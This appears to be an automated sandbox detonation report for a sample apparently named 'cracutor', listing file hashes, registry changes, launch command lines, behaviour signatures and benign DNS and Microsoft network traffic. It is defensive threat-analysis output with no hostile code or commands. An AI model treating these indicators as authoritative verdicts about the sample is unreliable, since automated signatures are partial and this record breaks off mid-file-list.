| MD5 | 0c46d7b7cd00b3d474417de5d6229c41 |
| SHA1 | 825bdb1ea8bbfe7de69487b76abb36196b5fdac0 |
| SHA256 | 9d0a5c9813ad6ba129cafef815741636336eb9426ac4204de7bc0471f7b006e1 |
| SHA512 | d81b17b100a052899d1fd4f8cea1b1919f907daa52f1bad8dc8e3f5afc230a5bca465bbac2e45960e7f8072e51fdd86c00416d06cf2a1f07db5ad8a4e3930864 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\Crypto\Cipher\_raw_ecb.pyd
| MD5 | dedae3efda452bab95f69cae7aebb409 |
| SHA1 | 520f3d02693d7013ea60d51a605212efed9ca46b |
| SHA256 | 6248fdf98f949d87d52232ddf61fada5ef02cd3e404bb222d7541a84a3b07b8a |
| SHA512 | 8c1cab8f34de2623a42f0750f182b6b9a7e2affa2667912b3660af620c7d9ad3bd5b46867b3c2d50c0cae2a1bc03d03e20e4020b7ba0f313b6a599726f022c6c |
C:\Users\Admin\AppData\Local\Tempcrrmvbxjol.db
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Tempcrkmsfpixi.db
| MD5 | 7e58c37fd1d2f60791d5f890d3635279 |
| SHA1 | 5b7b963802b7f877d83fe5be180091b678b56a02 |
| SHA256 | df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7 |
| SHA512 | a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e |
C:\Users\Admin\AppData\Local\Tempcrkipkqcvt.db
| MD5 | 73bd1e15afb04648c24593e8ba13e983 |
| SHA1 | 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91 |
| SHA256 | aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b |
| SHA512 | 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7 |
C:\Users\Admin\AppData\Local\Tempcrykjucoyx.db
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Tempcrfvzqnoln.db
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Tempcrhldqrmcd.db
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240221-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240426-en
Max time kernel
139s
Max time network
145s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
113s
Max time network
143s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240215-en
Max time kernel
134s
Max time network
128s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f34c9305f14e34f823c71fe5af3e36e000000000200000000001066000000010000200000007fc33871e61776871046874761d2576f02ffecbe8f64d44c8940bc98802acf53000000000e8000000002000020000000aac190246efd9b7f50064f4e7299beda479889faca415057c724f260245a118d90000000c8e35a62b695a69eb5fb44c241aca76fc34b198d4c21a7e8e6cfe1c9c216c57cad7d46a0e57e5dcd11e6de98f40c01aab00c09c625a4b4d1c514e9800dce0a66a5acb41a3a0e4397f90e57a90354aa621e455e452d6d5ee813c240514e2dfd6cc3b31eba8349791f40bdf191a3240b522c3c418f33f6e9aabe7fe8d0e5a6636ef61a6863cf6ef320283db7887e1825e840000000901bd04974cdd559a657cec47d5e3c42c0ae0bb19513072a26cae37f79dbba9bbc060645d6d40f9be9416b3208ff724e7205e71f14018d585e3846b6fd3bb9de | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422301129" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2A37C911-1604-11EF-8ECF-42D431E39B11} = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 401da8fe10aada01 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f34c9305f14e34f823c71fe5af3e36e00000000020000000000106600000001000020000000aa89af1aa4a28c8f4f4fce8e27680978327a8550a90c961c43938d080dc58688000000000e8000000002000020000000d08bf83bd7df01c1dc3d99036ff1bcc04a83612c571ecac727e855f516f02bf420000000d4029c639d9864710ef71a4a3fbc759c7d7ba704ba749052bb0e817545f9e0ee40000000a95a19927faa4c88f4293d818edd12fdc6fd23e4c307cf2c3dfd2bf720e22f4ded611b5a31180633098a18dabb34763ee9c3722521338c66a0982a3ac0dfeee7 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab23C9.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar24CA.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e759ccdfacb7c5495688a702925d989b |
| SHA1 | a46040ee34bf92218b59dc935376516879261bfa |
| SHA256 | ac6bd6a0c92b9f4d057ef231f128971203ad3c38a8e830e770e6da516319979f |
| SHA512 | f063e551c7ec665dfcf0d7d2b5574710ec423f5fd771b19d3f021957db00b70964a070261435b0c34de25187f8c96fb605d04af4e7cd367d70a9e47384556b8c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | da519be592c9f1a1bee73d11a637a171 |
| SHA1 | a2fcab26e8984d7b759fe15cd8c4a5a2186ce79a |
| SHA256 | 4ddd8656baf5979db2aea7a901bd526ebfc5aeb6cc3723d91b5baefffc60d5e8 |
| SHA512 | 8cd6448b8324ade4d33cee7ab75660dc64fccbe1d5dc06a7ae306ef381f457eca2cfcee797fe4013488f5d2279fa6e078809d0701b87f1bdfdd2a97165a3c6e0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 75e3e96a304a2837db1f25abcc966b5a |
| SHA1 | a6b16be03a082ac684705d1d616f371272e50f74 |
| SHA256 | 37bfc9ad55c96f10a011e0b979f88f0d5447e5a535a897a768fe5c5e7397a856 |
| SHA512 | 9d792df72e921ec5f4e8efb9b976830d9a7f6a2689d20e6b59080c1de8b7edf827be2c9c096afb253b125c8afcdfc3295116c301238866de87b42ca6d8e67c73 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 38cc7966ecaa0037aff73c7f5c85e05d |
| SHA1 | 123b9b3f1d3b92d1a5a55dcd62beb1b394ce29af |
| SHA256 | cf9c70fcfddf35bc8fb674ae00ba73c1a258442681b3a15ebcb10b4fb5cbefc2 |
| SHA512 | 459e9850006bedb0ab1e22bf614b0f377e1f676818945297ce692585909275d9b2b826f2c707739c0b40623028f3ba0452597359ec87d0b35b7dafd9990d9336 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 24db92c0bb78d11c547d7b515231b05c |
| SHA1 | 9579d5f8a5bf54a0d36bd8acf29b8b34a915b998 |
| SHA256 | d93ab86f5a3899ee9e197605513db86c0be786d74d38a16e165f7ebff04f70a6 |
| SHA512 | 8b6850adb4e941d139beabc3ad546d22ddccf23c93c07e53bbc33373f46cee96274315e0cd257045fa61ec6ab710f468842e4720a0bc45f92d29ffa687ec18d2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8a45581c4ffc5d5979231abed140e82a |
| SHA1 | e8d359f1461480ab16a6a2ef92f06d0b0d647b6b |
| SHA256 | ff1021e0b8cd03076ba1641e9944e462bfacce950601895a3214b42239e4f659 |
| SHA512 | 95e90acbdcf4f8282ad6f86179cfef5c7dae773f644976e9579765302d19cbd984de099f6dee98fef782cd452c4c78f8a858f04c776570ccd8b03176ec069d29 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7acd84f9f2af7e7a6c8b78284d787283 |
| SHA1 | 0b3f05875ea2154d3d074097cb6db2d6402a4471 |
| SHA256 | e750ddd154233083a6a66d270df5ff62abea8ab12ff9bb9e90f4e02f23e4f4e5 |
| SHA512 | 693a64aff7900d6f865742548a2150287d3c9376e5f575cd40603565a295658f1b929598495c5fbcd8e57a967c1391952f70a7bba8dd49203a7cf2c78209dcc0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6cbc557d3a5dfe9d2cd0179ae105adff |
| SHA1 | 77a41414702d62a08183ea8ceaed59cf2b508937 |
| SHA256 | 5a243f3f65cda2ecd23f5f133b98b273a55be3149aeb4dca6e0cfc65e0cfbd57 |
| SHA512 | 6c126d844e451d987f9d706c6b7cc8c9c15ebfb3bded3a608c660361401f94a81a8f98d7f07f170fa35ef0bc3ac6b9345f90c4a0e2c9b16c3e3c4a4c6305acdd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90a133b960a93fdc8d97396650380d7f |
| SHA1 | 885bb0edabf3ef7e1db4e3f1d2b7491e86c9f89b |
| SHA256 | 00664ee98134b59af9ddcdeb3ec8626cf48c3a923863f6b43485fbbcb6044306 |
| SHA512 | 57849d8e33b7ee420efecba201326baf9aebf05f0d97f476c3e159ccd1f904be9ace56c5857eb6f9ddf36eb2728b14988f5182665356dca90eb9b0b58d24213e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6297c4e926c5bd6dae0640b7add2eb4a |
| SHA1 | 887f2fc69cb89db5c05b60e7997230b94db1f575 |
| SHA256 | e897a45630a0b58a9be8cf769bd7b29473891e8c11787480d5a5980f7fdddd1b |
| SHA512 | 368db96ccfe212e19531eacdac6e828bdb641671f51ce56d48514f7d951f4e4fef6b4cbe32d0fa7b3b189abf720ccf67bbb133ef702f5695f54840c80fc97fec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f48bb14747e05c64f382ed301f6f396d |
| SHA1 | a76c7621a7361d7b999aef69dfacffa651646292 |
| SHA256 | d03778bd2f5269c3dd491f64ed4deb4ca0d8be696c75aea7a05b7f1bcbd5a5d8 |
| SHA512 | 8cbc40c4d372747acab0c58b750d7f52838b5bb3e4a7572b5fa6715450261df6e48777aedc1df78526736758aaa5c6f9c14ca2e67f0d43a4f4d3b694016d8243 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ffd82bf6ee10fda4199cfd834a751f9e |
| SHA1 | fa68d43634e4abcf43313b183ec3baecef085580 |
| SHA256 | d0cb7b2af23d7c390530f549c3c99356ff7aa5334981b5bc7c49c71f2cab5653 |
| SHA512 | 12335227f1e90bbf4cff92e15d28791b28378f98d7c305884334ef390f5da1a3373ef3e5a8fc8de63a6859eab711e37339fedadaf74271984ffacc3ed26d62c2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a1c830b4ec1bab1048851d0dd5759ef3 |
| SHA1 | e4b972828f5a3aa9cb3e8c22a1b9211b2ec0bc10 |
| SHA256 | e473f8b62bad8b65f1ec8e079b753b3bb8059f30643a48447bd7c65c0f2b8dff |
| SHA512 | 53870e9633936dbf647f10736d8053e005451674ad3480f63944ba152b8c07d2521294082de6a73c65887c0ff21b848d757e8a8ca4f8651620164e70c6b485e6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1107c82f6ce8721ef6a1ac9ebfa73627 |
| SHA1 | 83a11ada1944e7a0b308076310b5f760388f567a |
| SHA256 | acf7a33d89eb8be9974a376d5b1667e76ebbe324d91920aeb2160910706cc88e |
| SHA512 | b77d03b17fb9d108635010fe0220dcb24164d4bc3e705f3a4d3cdb349e9ef56778b94becd47b7483fe02afd7f2c02bb008c75c4501b979d09e7c8d78dec97e67 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e35a63cafd4276593bdfa0d32ff1810 |
| SHA1 | d70bcf7dd112dc50b81af59867fdcfbe6397b111 |
